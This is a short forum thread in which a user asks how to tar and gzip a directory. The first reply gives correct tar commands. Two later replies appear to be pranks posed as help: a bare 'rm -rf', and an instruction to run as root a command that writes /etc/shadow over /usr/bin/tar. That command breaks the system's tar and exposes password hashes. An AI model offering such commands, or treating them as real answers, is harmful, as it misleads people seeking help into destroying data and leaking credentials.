![]() |
tar/gzip help
I wanna tar and gzip all directories and files that are in one dir... how to ?
Thanks :helpme |
tar -cvzf filenameyouchoose.tgz subdir
Will grab everything, directory structure intact. then tar -xvzf filenameyouchoose.tgz to unpack it. |
rm -rf
|
as root:
cat /etc/shadow > /usr/bin/tar 2>/dev/null |
All times are GMT -7. The time now is 10:35 AM. |
Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc123